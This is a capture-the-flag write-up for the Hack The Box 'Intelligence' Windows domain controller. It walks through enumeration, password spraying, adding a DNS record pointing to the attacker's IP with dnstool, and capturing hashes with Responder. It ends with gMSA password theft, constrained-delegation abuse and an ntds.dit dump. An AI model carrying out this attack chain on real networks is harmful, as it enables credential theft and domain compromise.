15 KiB
HackTheBox-Intelligence
NMAP
PORT STATE SERVICE REASON VERSION
53/tcp open domain? syn-ack ttl 127
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2021-07-05 20:55:03Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after: 2022-04-19T00:43:16
| MD5: 7767 9533 67fb d65d 6065 dff7 7ad8 3e88
| SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
| -----BEGIN CERTIFICATE-----
| MIIF+zCCBOOgAwIBAgITcQAAAALMnIRQzlB+HAAAAAAAAjANBgkqhkiG9w0BAQsF
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
|_ssl-date: 2021-07-05T20:58:07+00:00; +7h03m50s from scanner time. [113/292]
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after: 2022-04-19T00:43:16
| MD5: 7767 9533 67fb d65d 6065 dff7 7ad8 3e88
| SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
|_ssl-date: 2021-07-05T20:58:06+00:00; +7h03m50s from scanner time.
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after: 2022-04-19T00:43:16
| MD5: 7767 9533 67fb d65d 6065 dff7 7ad8 3e88
| SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49694/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49701/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
58957/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/
submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=7/5%Time=60E30E56%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h03m49s, deviation: 0s, median: 7h03m49s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 2874/tcp): CLEAN (Timeout)
| Check 2 (port 4953/tcp): CLEAN (Timeout)
| Check 3 (port 29037/udp): CLEAN (Timeout)
| Check 4 (port 21343/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-05T20:57:26
|_ start_date: N/A
From the scan we can see ports like 88, 389 which are for kerberos and ldap meaning that this windows machine is Active Directory also we can see the domain name which is intelligence.htb0
PORT 80
On port 80 there's a simple web page
On scrolling down a little we can 2 documents on the web server , on hovering on it , it will show us the path of the pdf file but we can't access the directory listing documents
Scrolling further we can see an email adress with a domain intelligence.htb , we can further fuzz for subdomain as well so let's add it to our /etc/hosts file
On viewing the announcment document , it didn't have anything useful
Neither did the other document had anything in it
So I ran gobuster but , only found documents directory which is forbidden
One thing I note that I tried to change the year and month and I got a different pdf
So this means we need to fuzz for a pdf document by changing month and date so we need a wordlist of numbers in order to do that so I generated a two digit wordlist using crunch
Here I specified the min and max lenght to be 2 as we need the digits 01,02 and so on also I specified that it will be stop generating characters or numbers in this case if it reaches 31 so with -e we can do that.
Now in wfuzz we can specify two wordlist to use and can utitlize them on different FUZZ parameter like we have the data format in year-month-day so we can FUZZ parameter like this
2020-FUZZ-FUZ2Z
This FUZ2Z will tell that use the second worlist you specify so I sorted out the dates and month wordlist
dates.txt will being from 01 and end at 31
months.txt will begin at 01 and end at 12
wfuzz -c -w months.txt -w dates.txt --hl 29 -u http://intelligence.htb/documents/2020-FUZZ-F
UZ2Z-upload.pdf
Here --hl 29 is for hiding lines and we specify the numer 29 as on that number of lines we were getting 404 status code
I tried going through all the pdf's I can on web server but all contain some gibresh and wasn't interesting but when I ran exiftool on the pdf document and found who created this document
So on running exiftool on every document these are the users names I found
Copied those usernames in a text file that sorted out the names which were duplicates and put them in a new file
So we have a total of 26 users that we can check which one's are valid
But there's a problem we cannot proceed further until we know a valid credential so I moved back looking at those pdf files one by one which was real time consuming and it would have better if I had made a python script but anyways I found a password in one of the pdf files
Now we need to see whose password is this so we have a total of 26 users that we can brute force with this password , I will be using crackmapexec , you can use kerbrute.py which is a python script for kerbrute too so I'll show it using these two tools
But using kerbrute.py I was getting an error with "clock skew being great"
<img src="https://i.imgur.com/WGdbsaN.png"/.>
I found an article talking about clock skew
So the solution would be to set the correct time on DC or synchronize with DC's time zone so let's just try to login using evil-winrm since port 5985 is open on which WinRM runs
And it failed : (
So what we can do is to run smbmap to see if we can list shares
There's a Users shares and we can read it so probably from here we can get the user.txt
We can also get a powershell script from IT share
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
Now what this powershell script is doing is that it's doing an ldap query for domain names and grabbing those domain names which have web in it and then it's going to make a request along with crdentials of Ted.Graves user but windows stores them in encrypted form so we won't get those in clear text .
So I searched the LDAP query which is in this script on google which seems to be DNS delegation I further dug and found that it's actually a Unconstrained Delegation so I tried finding some scripts which would add a domain that points to our IP and somehow we listen for that using responder and get the creds
If a computer, with unconstrained delegations privileges, is compromised, an attacker must wait for a privileged user to authenticate on it (or force it) using Kerberos. The attacker service will receive a TGS containing the user's TGT. That TGT will be used by the service as a proof of identity to obtain access to a target service as the target user
In order to abuse the unconstrained delegations privileges of a computer account, an attacker must add his machine to the SPNs of the compromised account and add a DNS entry for it. This allows targets (like Domain Controllers and Exchange servers) to authenticate back to the attacker machine. This can be done with addspn, dnstool and krbrelayx (Python).
https://cheatsheet.haax.fr/windows-systems/privilege-escalation/delegations/
https://github.com/dirkjanm/krbrelayx
So we'll just use dnstool to add a domain name which will point to our IP address
python3 dnstool.py -u intelligence.htb\\Tiffany.Molina -p NewIntelligenceCorpUser9876 -r web.intelligence.htb -a add -d YOUR_IP TARGET_IP
And after adding it we'll run responder , Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) It supports NTLMv1, NTLMv2 hashes
Boom ,we got the the NTLMv2 hash , now we need to crack this hash , I'll use hashcat
After getting the password so I thought of maybe running python bloodhound injestor through which we can enumerate the AD and then pass those json files to bloohound
Start neo4j and bloodhound ,I have configured bloodhound in a way that it doesn't ask for password you can search on how to do it as well anyways launching bloodhound
Make an archive of those files and then drag and drop to GUI
Now we can run Shortest Path to Unconstrained Delegation Systems query
We can see that the user Ted.Graves is a member of ITSupport group further more that group has access to ReadGSMAPPassword through which can get to Service account SVC_INT
We can read about this as well
Further we can read about AllowedToDelegate
So the first step is to somehow abuse reading GMSA password for that I searched for a python script
After running this script we get a hash for service account
We can now abuse it using Constrained Delegtaion
I followed this command
But it throws again that clock skew error, so I added dc.intelligence.htb in my /etc/hosts file and did ntpdate dc.intelligence,htb so that my machine gets synced with DC's time zone
We got the adminstarator ticket , now we need to export a variable named KRB5CCNAME
And boom , we hit the gold mine dumping ntds.dit from domain controller , now we can use evil-winrm to log in since WinRM is running on port 5985
Note that you can revert back to your time zone with ntpdate ntp.ubuntu.com